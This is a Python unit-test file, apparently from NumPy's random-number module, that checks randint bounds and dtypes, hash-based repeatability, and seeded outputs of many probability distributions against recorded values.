def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.prng.negative_binomial(0.5, 0.5)
class TestRandint(TestCase):
rfunc = np.random.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=np.float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_full_range(self):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
try:
self.rfunc(lbnd, ubnd, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self):
# Don't use fixed seed
np.random.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool_)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
import hashlib
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but np.bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': '7dd3170d7aa461d201a65f8bcf3944b0',
'int16': '1b7741b80964bb190c50d541dca1cac1',
'int32': '4dc9fcc2b395577ebb51793e58ed1a05',
'int64': '17db902806f448331b5a758d7d2ee672',
'int8': '27dd30c4e08a797063dffac2490b0be6',
'uint16': '1b7741b80964bb190c50d541dca1cac1',
'uint32': '4dc9fcc2b395577ebb51793e58ed1a05',
'uint64': '17db902806f448331b5a758d7d2ee672',
'uint8': '27dd30c4e08a797063dffac2490b0be6'}
for dt in self.itype[1:]:
np.random.seed(1234)
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
        # bools do not depend on endianness
np.random.seed(1234)
val = self.rfunc(0, 2, size=1000, dtype=np.bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(np.bool).name] == res)
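    # A hedged sketch (added; `_demo_little_endian_hash` is an invented name):
    # the endian normalisation used above, shown in isolation. On big-endian
    # hosts byteswap() makes the raw bytes match the little-endian reference
    # hashes in `tgt`.
    def _demo_little_endian_hash(self):
        import hashlib
        np.random.seed(1234)
        val = self.rfunc(0, 6, size=1000, dtype=np.int32)
        if sys.byteorder != 'little':
            val = val.byteswap()
        assert_(hashlib.md5(val.view(np.int8)).hexdigest() ==
                '4dc9fcc2b395577ebb51793e58ed1a05')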
def test_int64_uint64_corner_case(self):
        # When stored in NumPy arrays, `lbnd` is cast
        # as np.int64, and `ubnd` is cast as np.uint64.
        # Checking whether `lbnd` >= `ubnd` used to be
        # done solely via direct comparison, which is incorrect
        # because when NumPy tries to compare both numbers,
        # it casts both to np.float64, since there is
        # no integer superset of np.int64 and np.uint64. However,
        # `ubnd` is too large to be represented in np.float64,
        # causing it to be rounded down to np.iinfo(np.int64).max,
        # leading to a ValueError because `lbnd` now equals
        # the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1)
# None of these function calls should
# generate a ValueError now.
actual = np.random.randint(lbnd, ubnd, dtype=dt)
assert_equal(actual, tgt)
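    # A hedged illustration (added; `_demo_float64_promotion` is an invented
    # name) of the pitfall described above: int64 and uint64 share no integer
    # superset, so a mixed comparison promotes both operands to np.float64,
    # where 2**63 - 1 and 2**63 collapse to the same value.
    def _demo_float64_promotion(self):
        lbnd = np.int64(np.iinfo(np.int64).max)
        ubnd = np.uint64(np.iinfo(np.int64).max + 1)
        assert_(np.float64(lbnd) == np.float64(ubnd))
        assert_(not (lbnd < ubnd))  # the comparison the old check relied on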
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
self.assertEqual(sample.dtype, np.dtype(dt))
for dt in (np.bool, np.int, np.long):
lbnd = 0 if dt is np.bool else np.iinfo(dt).min
ubnd = 2 if dt is np.bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
self.assertFalse(hasattr(sample, 'dtype'))
self.assertEqual(type(sample), dt)
class TestRandomDist(TestCase):
# Make sure the random distribution returns the correct value for a
# given seed
def setUp(self):
self.seed = 1234567890
def test_rand(self):
np.random.seed(self.seed)
actual = np.random.rand(3, 2)
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
np.random.seed(self.seed)
actual = np.random.randn(3, 2)
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randint(self):
np.random.seed(self.seed)
actual = np.random.randint(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers(self):
np.random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
assert_(len(w) == 1)
desired = np.iinfo('l').max
assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random_sample(self):
np.random.seed(self.seed)
actual = np.random.random_sample((3, 2))
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_choice_uniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False,
p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
np.random.seed(self.seed)
actual = np.random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['c', 'd', 'c', 'd'])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = np.random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(np.random.choice(2, replace=True)))
assert_(np.isscalar(np.random.choice(2, replace=False)))
assert_(np.isscalar(np.random.choice(2, replace=True, p=p)))
assert_(np.isscalar(np.random.choice(2, replace=False, p=p)))
assert_(np.isscalar(np.random.choice([1, 2], replace=True)))
assert_(np.random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(np.random.choice(2, s, replace=True)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False)))
assert_(not np.isscalar(np.random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(np.random.choice([1, 2], s, replace=True)))
assert_(np.random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(np.random.choice(6, s, replace=True).shape, s)
assert_equal(np.random.choice(6, s, replace=False).shape, s)
assert_equal(np.random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(np.random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(np.random.choice(np.arange(6), s, replace=True).shape, s)
def test_bytes(self):
np.random.seed(self.seed)
actual = np.random.bytes(10)
desired = b'\x82Ui\x9e\xff\x97+Wf\xa5'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, 1),
("b", np.int32, 1)])]:
np.random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
np.random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
np.random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
np.random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_beta(self):
np.random.seed(self.seed)
actual = np.random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
np.random.seed(self.seed)
actual = np.random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[37, 43],
[42, 48],
[46, 45]])
assert_array_equal(actual, desired)
def test_chisquare(self):
np.random.seed(self.seed)
actual = np.random.chisquare(50, size=(3, 2))
desired = np.array([[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
np.random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = np.random.mtrand.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598]],
[[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688]],
[[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799]]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, np.random.dirichlet, p, np.float(1))
def test_exponential(self):
np.random.seed(self.seed)
actual = np.random.exponential(1.1234, size=(3, 2))
desired = np.array([[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(np.random.exponential(scale=0), 0)
assert_raises(ValueError, np.random.exponential, scale=-0.)
def test_f(self):
np.random.seed(self.seed)
actual = np.random.f(12, 77, size=(3, 2))
desired = np.array([[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
np.random.seed(self.seed)
actual = np.random.gamma(5, 3, size=(3, 2))
desired = np.array([[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(np.random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, np.random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
np.random.seed(self.seed)
actual = np.random.geometric(.123456789, size=(3, 2))
desired = np.array([[8, 7],
[17, 17],
[5, 12]])
assert_array_equal(actual, desired)
def test_gumbel(self):
np.random.seed(self.seed)
actual = np.random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(np.random.gumbel(scale=0), 0)
assert_raises(ValueError, np.random.gumbel, scale=-0.)
def test_hypergeometric(self):
np.random.seed(self.seed)
actual = np.random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[10, 10],
[10, 10],
[9, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = np.random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = np.random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
np.random.seed(self.seed)
actual = np.random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(np.random.laplace(scale=0), 0)
assert_raises(ValueError, np.random.laplace, scale=-0.)
def test_logistic(self):
np.random.seed(self.seed)
actual = np.random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
np.random.seed(self.seed)
actual = np.random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(np.random.lognormal(sigma=0), 1)
assert_raises(ValueError, np.random.lognormal, sigma=-0.)
def test_logseries(self):
np.random.seed(self.seed)
actual = np.random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[2, 2],
[6, 17],
[3, 6]])
assert_array_equal(actual, desired)
def test_multinomial(self):
np.random.seed(self.seed)
actual = np.random.multinomial(20, [1/6.]*6, size=(3, 2))
desired = np.array([[[4, 3, 5, 4, 2, 2],
[5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4],
[2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3],
[4, 3, 4, 2, 3, 4]]])
assert_array_equal(actual, desired)
def test_multivariate_normal(self):
np.random.seed(self.seed)
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = np.random.multivariate_normal(mean, cov, size)
        desired = np.array([[[1.463620246718631, 11.73759122771936],
[1.622445133300628, 9.771356667546383]],
[[2.154490787682787, 12.170324946056553],
[1.719909438201865, 9.230548443648306]],
[[0.689515026297799, 9.880729819607714],
[-0.023054015651998, 9.201096623542879]]])
assert_array_almost_equal(actual, desired, decimal=15)
        # Check the default size; this used to raise a deprecation warning
actual = np.random.multivariate_normal(mean, cov)
desired = np.array([0.895289569463708, 9.17180864067987])
assert_array_almost_equal(actual, desired, decimal=15)
        # Check that a non-positive-semidefinite covariance matrix warns
        # with RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, np.random.multivariate_normal, mean, cov)
        # and that it doesn't warn with RuntimeWarning when check_valid='ignore'
assert_no_warnings(np.random.multivariate_normal, mean, cov,
check_valid='ignore')
        # and that it raises a ValueError when check_valid='raise'
assert_raises(ValueError, np.random.multivariate_normal, mean, cov,
check_valid='raise')
def test_negative_binomial(self):
np.random.seed(self.seed)
actual = np.random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[848, 841],
[892, 611],
[779, 647]])
assert_array_equal(actual, desired)
def test_noncentral_chisquare(self):
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = np.random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[1.47145377828516666, 0.15052899268012659],
[0.00943803056963588, 1.02647251615666169],
[0.332334982684171, 0.15451287602753125]])
assert_array_almost_equal(actual, desired, decimal=14)
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
np.random.seed(self.seed)
actual = np.random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
np.random.seed(self.seed)
actual = np.random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(np.random.normal(scale=0), 0)
assert_raises(ValueError, np.random.normal, scale=-0.)
def test_pareto(self):
np.random.seed(self.seed)
actual = np.random.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[2.46852460439034849e+03, 1.41286880810518346e+03],
[5.28287797029485181e+07, 6.57720981047328785e+07],
[1.40840323350391515e+02, 1.98390255135251704e+05]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# http://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
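        # (Added note: one "nulp" is one unit in the last place, so nulp=30
        # tolerates an elementwise difference of roughly
        # 30 * np.spacing(abs(desired)).)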
def test_poisson(self):
np.random.seed(self.seed)
actual = np.random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[1, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, np.random.poisson, lamneg)
assert_raises(ValueError, np.random.poisson, [lamneg]*10)
assert_raises(ValueError, np.random.poisson, lambig)
assert_raises(ValueError, np.random.poisson, [lambig]*10)
def test_power(self):
np.random.seed(self.seed)
actual = np.random.power(a=.123456789, size=(3, 2))
desired = np.array([[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
np.random.seed(self.seed)
actual = np.random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(np.random.rayleigh(scale=0), 0)
assert_raises(ValueError, np.random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
np.random.seed(self.seed)
actual = np.random.standard_cauchy(size=(3, 2))
desired = np.array([[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
np.random.seed(self.seed)
actual = np.random.standard_exponential(size=(3, 2))
desired = np.array([[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
np.random.seed(self.seed)
actual = np.random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gamma_0(self):
assert_equal(np.random.standard_gamma(shape=0), 0)
assert_raises(ValueError, np.random.standard_gamma, shape=-0.)
def test_standard_normal(self):
np.random.seed(self.seed)
actual = np.random.standard_normal(size=(3, 2))
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
np.random.seed(self.seed)
actual = np.random.standard_t(df=10, size=(3, 2))
desired = np.array([[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
np.random.seed(self.seed)
actual = np.random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
np.random.seed(self.seed)
actual = np.random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = np.random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
np.random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, np.random.uniform, throwing_float, throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, np.random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
np.random.seed(self.seed)
actual = np.random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
        # check that there is no infinite loop, gh-4720
np.random.seed(self.seed)
r = np.random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
np.testing.assert_(np.isfinite(r).all())
def test_wald(self):
np.random.seed(self.seed)
actual = np.random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
np.random.seed(self.seed)
actual = np.random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
assert_equal(np.random.weibull(a=0), 0)
assert_raises(ValueError, np.random.weibull, a=-0.)
def test_zipf(self):
np.random.seed(self.seed)
actual = np.random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29],
[1, 1],
[3, 13]])
assert_array_equal(actual, desired)
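# A minimal sketch (added; `_demo_seeded_draw` is an invented name) of the
# pattern every TestRandomDist case follows: reseed the global state, draw a
# fixed shape, and compare digit-for-digit against values recorded from a
# reference build of the generator.
def _demo_seeded_draw():
    np.random.seed(1234567890)
    actual = np.random.rand(3, 2)
    desired = np.array([[0.61879477158567997, 0.59162362775974664],
                        [0.88868358904449662, 0.89165480011560816],
                        [0.4575674820298663, 0.7781880808593471]])
    assert_array_almost_equal(actual, desired, decimal=15)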
class TestBroadcast(TestCase):
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setUp(self):
self.seed = 123456789
def setSeed(self):
np.random.seed(self.seed)
# TODO: Include test for randint once it can broadcast
# Can steal the test written in PR #6938
def test_uniform(self):
low = [0]
high = [1]
uniform = np.random.uniform
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
self.setSeed()
actual = uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
normal = np.random.normal
desired = np.array([2.2129019979039612,
2.1283977976520019,
1.8417114045748335])
self.setSeed()
actual = normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc * 3, bad_scale)
self.setSeed()
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
beta = np.random.beta
desired = np.array([0.19843558305989056,
0.075230336409423643,
0.24976865978980844])
self.setSeed()
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
